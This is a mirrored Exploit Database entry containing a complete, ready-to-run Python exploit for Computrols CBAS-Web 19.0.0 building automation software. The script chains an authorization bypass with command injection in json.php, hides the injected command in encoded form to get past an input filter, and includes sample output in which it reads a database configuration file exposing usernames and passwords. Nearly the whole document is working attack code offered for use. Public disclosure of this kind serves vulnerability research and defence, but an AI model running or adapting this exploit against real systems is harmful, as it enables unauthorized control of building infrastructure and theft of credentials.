CBAS-Web 19.0.0 – Remote Code Execution

• Exploit Database
• 107 阅读

• 作者： LiquidWorm
  日期： 2019-11-12
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47627/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158

  # Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : N/A # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system   #!/usr/bin/env python   &apos;&apos;&apos; Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit Affected versions: 19.0.0 and below by Sipke Mellema, 2019     Uses two vulnerabilities for executing commands: - An authorization bypass in the auth module (CVE-2019-10853) - A code execution vulnerability in the json.php endpoint (CVE-2019-10854)   Example usage: $ python CBASWeb_19_rce.py 192.168.1.250 "cat /var/www/cbas-19.0.0/includes/db.php" ------------==[CBAS Web v19 Remote Command Injection   [*] URL: http://192.168.1.250/ [*] Executing: cat /var/www/cbas-19.0.0/includes/db.php [*] Cookie is authenticated [*] Creating Python payload.. [*] Sending Python payload.. [*] Server says: <?php // Base functions for database access // Expects a number of constants to be set.Set settings.php   // Only allow local access to the database for security purposes if(defined(&apos;WINDOWS&apos;) && WINDOWS){ define(&apos;MYSQL_HOST&apos;, &apos;192.168.1.2&apos;); define(&apos;DB_USER&apos;, &apos;wauser&apos;); define(&apos;DB_PASS&apos;, &apos;wapwstandard&apos;); /*define(&apos;DB_USER&apos;, &apos;root&apos;); define(&apos;DB_PASS&apos;, &apos;souper secrit&apos;);*/ ...   &apos;&apos;&apos;   import requests import sys import base64 as b import json     def debug_print(msg, level=0): if level == 0: print "[*] %s" % msg if level == 1: print "[-] %s" % msg   # Check parameters if len(sys.argv) < 3: print "Missing target parameter\n\n\tUsage: %s <IP or hostname> \"<cmd>\"" % __file__ exit(0)   print "------------==[CBAS Web v18 Remote Command Injection\n"   # Set host, cookie and URL host = sys.argv[1] cookies = {&apos;PHPSESSID&apos;: &apos;comparemetoasummersday&apos;} url = "http://%s/" % host   debug_print("URL: %s" % url)   # Command to execute # Only use single quotes in cmd pls icmd = sys.argv[2] if &apos;"&apos; in icmd: debug_print("Please don&apos;t use double quotes in your command string", level = 1) exit(0)   debug_print("Executing: %s" % icmd)   # URL for performing auth bypass by setting the auth cookie flag to true auth_bypass_req = "cbas/index.php?m=auth&a=agg_post&code=test" # URL for removing auth flag from cookie (for clean-up) logout_sess_req = "cbas/index.php?m=auth&a=logout" # URL for command injection and session validity checking json_checks_req = "cbas/json.php"   # Perform logout def do_logout(): requests.get(url + logout_sess_req, cookies = cookies)   # Check if out cookie has the authentication flag def has_auth(): ret = requests.get(url + json_checks_req, cookies = cookies) if ret.text == "Access Forbidden": return False return True   # Set auth flag on cookie def set_auth(): requests.get(url + auth_bypass_req, cookies = cookies)   # =======================================================   # Perform auth bypass if not authenticated yet if not has_auth(): debug_print("Cookie not yet authenticated") debug_print("Setting auth flag on cookie via auth bypass..") set_auth()   # Check if bypass failed if not has_auth(): debug_print("Was not able to perform authorization bypass :(") debug_print("Exploit failed, quitting..", level = 1) exit(0)   else: debug_print("Cookie is authenticated") debug_print("Creating Python payload..")   # Payload has to be encoded because the server uses the following filtering in exectools.php: # $bad = array("..", "\\", "&", "|", ";", &apos;/&apos;, &apos;>&apos;, &apos;<&apos;); # So no slashes, etc. This means only two "&apos;layers&apos; of quotes"   # Create python code exec code cmd_python = &apos;import os; os.system("%s")&apos; % icmd # Convert to Python array cmd_array_string = str([ord(x) for x in cmd_python]) # Create command injection string p_unencoded = "DispatchHistoryQuery\t-i \"$(python -c &apos;exec(chr(0)[0:0].join([chr(x) for x in %s]))&apos;)\"" % cmd_array_string # Base64 encode for p parameter p_encoded = b.b64encode(p_unencoded)   # Execute command debug_print("Sending Python payload..") ret = requests.post(url + json_checks_req, cookies = cookies, data = {&apos;p&apos;: p_encoded})   # Parse result ret_parsed = json.loads(ret.text) try: metadata = ret_parsed["metadata"] identifier = metadata["identifier"]   debug_print("Server says:") print identifier   # JSON Parsing error except: debug_print("Error parsing result from server :(", level = 1)   # Uncomment if you want the cookie to be removed after use # debug_print("Logging out") # do_logout()